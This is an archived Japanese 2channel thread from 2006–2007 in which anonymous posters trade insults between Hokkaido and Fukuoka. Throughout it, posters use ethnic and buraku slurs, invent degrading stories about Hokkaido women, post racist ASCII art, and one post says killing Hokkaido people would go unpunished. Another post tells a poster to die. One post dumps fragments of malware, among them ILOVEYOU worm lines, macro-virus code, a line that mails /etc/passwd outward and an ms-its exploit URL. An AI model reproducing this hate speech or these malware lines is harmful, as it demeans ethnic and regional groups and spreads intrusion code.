2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【朝鮮民族の親戚】捏造民族 北海道人【土人】

1 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 05:08:18 ID:2zSNXwJC0●
ウソはやめようね。札幌でランク王国やってないからって・・・

☆観て見たいイルミネーションランキング☆
1位 神戸
2位 六本木イルミネーション
3位 東京丸の内
4位 Fantastic Chistmas(横浜)
5位 中山競馬場イルミネーション
6位 仙台光のページェント
◇乗ってみたい特急列車ランキング◇
1位  のぞみ        東京−新大阪、博多など
2位  成田エクスプレス   東京−成田空港 
3位  サンライズ瀬戸・出雲  東京−高松、出雲市
4位 スーパービュー踊り子  東京─伊豆急下田
5位 つくばエクスプレス   秋葉原−つくば
※ランク王国調べ

つくばエクスプレスは厳密には特急列車ではないが
投票者が特急と思っているらしくランクイン

2 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 06:01:20 ID:1dR/7ebv0
>>1
これは酷い。フクオチョン人もついに狂ったかw自身でしょっぱなから大幅に捏造してやがる(笑笑)
ていうかおまえは毎日狂ってたけどなw
☆行って観たいイルミネーションランキング☆
1位 神戸
2位 函館クリスマスイルミネーション
3位 札幌雪まつりイルミネーション
4位 札幌ホワイトイルミネーション
5位 東京DRイルミネーション
6位 仙台光のページェント
◇乗ってみたい列車ランキング◇
1位 トワイライトエクスプレス 大阪―札幌
2位 カシオペア         上野─札幌
3位 北斗星           上野─札幌
4位 スーパービュー踊り子  東京─伊豆急下田
5位 北斗            札幌─函館
※ジャラン調べ、ランク王国でも放送

3 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 06:08:34 ID:ATD2vpxg0
チョン以下の底辺住民を叩くのに捏造する必要性があるのか…。
>>1-2どちらもソース無しで無効。

スレタイだけはまともなのでこのまま続行!

4 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 06:10:30 ID:Igc+NbzV0
>>スレタイだけはまともなので

突っ込むところはココですか?

5 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 06:15:47 ID:ATD2vpxg0
それと全て福岡系がやってると思い込んでるのか
それとも工作発言か真意は知らないが
北海道とここの北海道人が嫌われてることも念頭におけよ。
同じチョンでも韓国と北朝鮮では日本人の感情は180℃違うからな。
日本人が激しく嫌悪感抱くのは北と名が付く朝鮮のほう。
北と名が付く日本領にも同じ感情持つ日も近い気がするぜ。

6 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 06:28:16 ID:1dR/7ebv0
>>5
もういい加減そういう成りすましの手はバレテルンダカラやめとけ
おまえもおなじみの文章からいつものフクオチョン人だというのが丸出しだぞw

弥生系一重=福岡>>北海道
チョン人口=福岡>>北海道
その他チョン系=福岡>>北海道 



7 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 07:05:16 ID:2zSNXwJC0
最近知ったことですが、北海道人の女性はおしっこの後に
股間を拭かないそうです。男性と違って、女性の場合は
おしっこをすると、陰毛が濡れたり、股間全体が不衛生になりがちですので、
拭くのが内地では常識だと思います。
インターネットで検索すると北海道の女性はおしっこをしても
股間を拭かないという情報がいっぱい出てきて驚きます。
なぜ拭かなくても平気なのか理解できません。
北海道人女性と交流のある方、私の疑問に答えてくれませんか?
北海道は隣なので仲良くしたいと思っているのですが、
こんな事実を知ってがっかりです。

8 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 07:30:30 ID:6rO/jbvW0
削除おねがいします

9 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 07:31:59 ID:rZG3WSheO
マーキングの一種かもよ。
日本人と掛け離れた嗅覚を備えてるのかもしれない(笑)

10 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 08:06:18 ID:1oh34utrO
なにかと思ったらハンベッド名古屋人か。

11 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 08:54:47 ID:EsQG0tpU0
何よこれ

12 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 09:44:04 ID:vhkBiiF70
>>11

フクオカンのエタの発狂。
部落民は基地外ばっかりだから困る。

13 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 10:07:11 ID:qsrsDl/j0
ランク王国が最近ようやく見られるようになった福岡について


14 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 10:27:49 ID:rZG3WSheO
捏造とは格下が格上に対して行う事だから、
最下層の道民が至る所でやってるのは理論的に証明できるね。

15 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 10:29:47 ID:Lse19RuX0
>>14

捏造コピペ貼りしているのはフクオカンコク。

16 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 11:07:52 ID:rZG3WSheO
フクオカンコクというのは福岡市及び福岡県のことを指してるのかな。
どちらにしても札幌、北海道より格上の存在だから理論的に説明できないね。

17 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 11:13:41 ID:DD1kMTHF0
>>16

>捏造とは格下が格上に対して行う事だから、
>最下層の道民が至る所でやってるのは理論的に証明できるね。

>どちらにしても札幌、北海道より格上の存在だから理論的に説明できないね。


上をあっさり否定する下を理論的に説明してくれ。

18 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 11:17:18 ID:rZG3WSheO
否定もしてないし、そのまま読めば普通の人は解ることだね。

19 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 11:19:46 ID:A9DiGaugO
福岡って本当に存在するの?

20 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 11:24:42 ID:bQTFuZ390
>>19

大韓民国済州道福岡市として実在しますよ。

21 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 11:54:02 ID:rZG3WSheO
いいね。
格下が格上に対して捏造する自然の流れだ。

22 :苫小牧セレブ ◆LcbOIIzvDU :2006/12/14(木) 12:02:54 ID:qhMgPRffO
いかがですか?

印 象 操 作 の 手 応 え は 。






23 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 12:06:26 ID:65mgCmAzO
ご機嫌いかが?
肥え溜めセレブさん?

24 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 12:06:49 ID:ceH7IK3E0




福岡の部落民が格上の北海道民を誹謗する捏造コピペをするスレはここですか?






25 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 12:09:05 ID:rZG3WSheO
その文末から下の改行は何か意味があるのでしょうか。

省略ボタン押すのがめんどくさいんですが。

26 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 12:13:04 ID:ceH7IK3E0
>>25

携帯厨wwwwwwwwwwwww
必死に携帯ボタンを押して札幌誹謗ですか?
おめでてえな。

27 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 12:22:27 ID:rZG3WSheO
めでたいなら紅白の餅、あんさんの頭に飾らんかいな。

28 :苫小牧セレブ ◆LcbOIIzvDU :2006/12/14(木) 12:23:17 ID:qhMgPRffO
>>23
肥え溜めってどういう意味ですの?
さすが田舎の方の発想は豊かでございますわね。

ほらほらカリフラワーの収穫の時間ですわよ(笑)





29 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 12:54:47 ID:ceH7IK3E0
>>27

福岡の携帯部落民が錯乱を起こしたようです。
意味不明。

30 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 20:10:57 ID:dXGHx6/WO
>>1
またテレビ厨の捏造か。しかもわざわざ専用スレまで立てるレベルじゃねえし。
さっさと削除依頼だせよ。

31 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 22:45:46 ID:f7v/ntzR0
田舎もんがそろってるな

32 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 23:06:31 ID:pCuK15v2O
>>26

PCでも負けるア北海厨wwwwwwwwwwwww
必死に頑張った結果、被害妄想ですか?
おめでてえな。
ア北海民にわざわざPCなんてもったいない。w

33 :名無しの歩き方@お腹いっぱい。:2006/12/15(金) 00:55:11 ID:7c/b5hbc0
>>32

はいはい、PCも持てない部落民はとっととバラックにお帰り。
ナメシ皮売ってとっととPC購入資金貯めろよ。
おっと、蛮地の福岡じゃPC売ってないんでしたっけ????

34 :名無しの歩き方@お腹いっぱい。:2006/12/15(金) 01:10:45 ID:VebnmYo90
友人が北海道旅行に行った時、食堂で焼肉を食べていたら、隣のテーブル
の主婦が赤ん坊をテーブルに載せてオムツを代え始めたそうだ。

北海道では驚くことではないみたいだよ。
私が道民の家で食事をご馳走になったときのこと、
2歳くらいのその家の男の子がむずかりだすと母親がその子を
テーブルの上に立たせてパンツを降ろし、牛乳の空き瓶をその子の
チンチンにあてがうとその子が牛乳瓶に小便をした。
しかも、あろうことかその牛乳瓶に入った小便をキッチンの流しに捨てたのだ。
その慣れた様子からも日常的にそういうことをしているのだとわかった。
やはりこういう人種とは相容れられないなと強烈に思った瞬間だった。

35 :名無しの歩き方@お腹いっぱい。:2006/12/15(金) 01:12:57 ID:Hj/6CmnW0
★札幌 田舎 の検索結果 約 1,290,000 件 福岡 田舎 の検索結果 約 1,530,000 件
★また札幌か の検索結果 約 16,900 件 また福岡か の検索結果 約 23,700 件
★福岡 北朝鮮 の検索結果 約 1,550,000 件 札幌 北朝鮮 の検索結果 約 740,000 件
 福岡 韓国 の検索結果 約 5,960,000 件 札幌 韓国 の検索結果 約 2,730,000 件
 福岡=もとのち朝鮮領土 約 43,800 件 札幌=もとのち朝鮮領土 約 23,400 件
 福岡=目が一重 約60,300 件 札幌=目が一重 約41,900 件
★福岡=チビ 約443,000 件 札幌=チビ 約350,000 件
 福岡=ブサイク 約262,000 件 札幌=ブサイク 約127,000 件
 福岡=狭い 約1,320,000 件 札幌=狭い 992,000 件
★福岡 犯罪 の検索結果 約 1,430,000 件 札幌 犯罪 の検索結果 約 1,170,000 件
 福岡 暴力団 の検索結果 約 404,000 件 札幌 暴力団 の検索結果 約 215,000 件
 福岡 殺人 の検索結果 約 1,300,000 件 札幌 殺人 の検索結果 約 773,000 件
 福岡 覚せい剤 の検索結果 約 131,000 件 札幌 覚せい剤 の検索結果 約 72,200 件
※ちなみに市をつけてもすべてフクオカンコク市が上回りますッ!

36 :名無しの歩き方@お腹いっぱい。:2006/12/16(土) 06:05:15 ID:B954Pwu80
最近知ったことですが、北海道人の女性はおしっこの後に
股間を拭かないそうです。男性と違って、女性の場合は
おしっこをすると、陰毛が濡れたり、股間全体が不衛生になりがちですので、
拭くのが内地では常識だと思います。
インターネットで検索すると北海道の女性はおしっこをしても
股間を拭かないという情報がいっぱい出てきて驚きます。
なぜ拭かなくても平気なのか理解できません。
北海道人女性と交流のある方、私の疑問に答えてくれませんか?
北海道は隣なので仲良くしたいと思っているのですが、
こんな事実を知ってがっかりです。

37 :苫小牧セレブ ◆LcbOIIzvDU :2006/12/16(土) 08:06:20 ID:FzcfU7RPO
>>36
「私は引きこもりです」まで読みました。






38 :名無しの歩き方@お腹いっぱい。:2006/12/16(土) 08:12:22 ID:B954Pwu80
道民殺しても警察が許してくれるさ
法律を運用するも市内も警察しだい♪

39 :名無しの歩き方@お腹いっぱい。:2006/12/16(土) 11:37:40 ID:l+XnOZEL0
4 :名無しの歌姫:2006/10/19(木) 07:13:42 ID:Nh/pZ01N
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???


40 :名無しの歩き方@お腹いっぱい。:2006/12/28(木) 06:06:11 ID:mKGnYj0X0
●●●嗚呼、北海道人●●●
僕は道を歩いていて、ときどき涙が出てくることがある。
「ああ、自分は北海道人なんだ」と思うと、自己嫌悪感がわきあがってくるのです。
親から北海道人であると教えられたときの絶望感がいまだに続いている。
「北海道人」・・・・・
その言葉を聞くと、僕は自然と自殺願望が出てきます。
自分たちは生きている価値があるのかと・・・・。
しかし、北海道人の先祖たちは僕に語りかけます。
「いいかい?北海道人は本州から富を搾取されるものなのだよ」と。
僕は罪悪感に打ち震えます。
北海道人に対する世間の風当たりも厳しい昨今。
でもそれはこれまで散々すき放題をしてきた僕たちへの罰なのでしょう。
本州人が真実に気づき始めた証拠なのでしょう。
これまで歴史捏造を主張してきた先人達の浅い知恵なのでしょう。
北海道で生活することにより、僕たち北海道人は日々堕落していくのです。
嗚呼なんておぞましき土民哉。
世界一の嫌われ土民。先祖たちの残した数々のおぞましい実績。
余計な説明は一切いらない。
ただ周りの人には「北海道人です。」の一言で嫌悪感の眼差しが。
北海道人に生まれて本当に悲しいです。

41 :名無しの歩き方@お腹いっぱい。:2006/12/28(木) 08:53:01 ID:na5R38QlO
外人助っ人頼りの札幌山の手ラグビー部!     傭兵混じりでBシードすら貰えない無敵の弱さ!

42 :苫小牧セレブ ◆LcbOIIzvDU :2006/12/28(木) 13:42:16 ID:OST9ZHFQO
>>40
とっとと死ねば?





43 :名無しの歩き方@お腹いっぱい。:2006/12/28(木) 13:46:46 ID:PZJwvf3l0
ヤクザの6割が同和、3割が在日朝鮮人
日本外国特派員協会での菅沼元公安調査庁調査第二部長の講演
2006年10月19日
http://www.youtube.com/watch?v=oBkjwmK6F6E
http://www.youtube.com/watch?v=1vV-f3kGRjg
http://www.youtube.com/watch?v=BzUz4J2x61A
http://www.youtube.com/watch?v=-bXAlN5Fwts
http://www.youtube.com/watch?v=rguKQJcphHE
http://www.youtube.com/watch?v=p4i9PBE-ESs


【関連ニュース】
元公安部長「日本はスパイ天国」 ヤクザと企業の“深い”関係も指摘
http://news.livedoor.com/webapp/journal/cid__2598950/detail

44 :名無しの歩き方@お腹いっぱい。:2006/12/28(木) 22:17:26 ID:yZNP4+3A0


  ∩∩ 僕 ら の 寄 生 は ず っ と だ べ !  V∩
  (7ヌ)                              (/ /
 / /                 ∧_∧            ||
/ /  ∧_∧     ∧_∧  _(´∀` )   ∧_∧   ||
\ \<丶`∀´>―-( `ハ´ ) ̄      ⌒ヽ<`∀´ > //
  \       /⌒   ⌒ ̄ヽ、道民 /~⌒    ⌒ /
   |      |ー、      / ̄|    //`i 在日  /
    | 在日 | |偽孤児 / (ミ   ミ)  |    |
   |    | |     | /      \ |    |
   |    |  )    /   /\   \|       ヽ
   /   ゝ | /  ヽ ヽ、_/)  (\    ) ゝ  |
   |  |  | /   /|   / レ   \`ー ' |  |  /  
http://www.yomiuri.co.jp/e-japan/hokkaido/kikaku/024/img/21_1.jpg


45 :名無しの歩き方@お腹いっぱい。:2007/01/03(水) 16:06:46 ID:r8D4vxCL0

       ∩∩ 僕 ら の 寄 生 は 来 年 も 続 く べ  V∩
       (7ヌ)                              (/ /
      / /                 ∧_∧            ||
     / /  ∧_∧     ∧_∧  _(´∀` )   ∧_∧   ||
     \ \<丶`∀´>―-( `ハ´ ) ̄      ⌒ヽ<`∀´ > //
       \       /⌒   ⌒ ̄ヽ、道民 /~⌒    ⌒ /
        |      |ー、      / ̄|    //`i 在日  /
         | 在日 | |偽孤児 / (ミ   ミ)  |    |
        |    | |     | /      \ |    |
        |    |  )    /   /\   \|       ヽ
        /   ゝ | /  ヽ ヽ、_/)  (\    ) ゝ  |
        |  |  | /   /|   / レ   \`ー ' |  |  /  
http://www.yomiuri.co.jp/e-japan/hokkaido/kikaku/024/img/21_1.jpg

株保有、道民の7% 購入希望者は全国で最低 日証協調査
http://www.hokkaido-np.co.jp/Php/kiji.php3?&d=20070103&j=0024&k=200701026566&ref=rs
06年金融資産 道内世帯は700万円 中部1352万円 格差広がる
http://www.hokkaido-np.co.jp/Php/kiji.php3?&d=20061231&j=0045&k=200612316306
生保の契約 道内は妻に手薄? 件数・金額全国最低
http://www.hokkaido-np.co.jp/Php/kiji.php3?&d=20061231&j=0045&k=200612316307
   / ̄ ̄\
 /   _ノ  \
 |    ( ●)(●)
. |     (__人__)   足手まといの北海道は
  |     ` ⌒´ノ   ロシアにでも売った方がいいだろ、常識的に考えて…
.  |         }
.  ヽ        }


46 :名無しの歩き方@お腹いっぱい。:2007/01/03(水) 16:36:06 ID:+e5t+wAqO
ここでも平壌人と道民が争ってるのか?www
雪国同士実は仲悪い?www

47 :名無しの歩き方@お腹いっぱい。:2007/01/03(水) 17:36:14 ID:55KZjHJF0
●北海道のバブルシリーズ
所得1万ドル時代を生きる北海道の現状は適切なのか。
もちろん道民所得が少ない現状に満足してしまっては困る。
より大きな志を持ってこそ発展の道も開かれる。
しかし道民の思考と判断基準自体が1万7000ドルではなく、
本州の3万−4万ドル水準に置かれているのではないだろうか。
ある程度のレベルでは満足しない‘意識バブル’こそが
北海道民の慢性病ではないか。
最近の好景気を受け、東京の名品店で高価商品を大量に買っていく
北海道人観光客の姿を見ながら思ったことだ。
身をわきまえて適切な行動をする意識改革がない限り、
‘バブルシリーズ’の続編はずっと登場しそうだ。

48 :名無しの歩き方@お腹いっぱい。:2007/01/06(土) 19:25:28 ID:mA02Q2rD0
道央以外は許してやろうよ

20 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)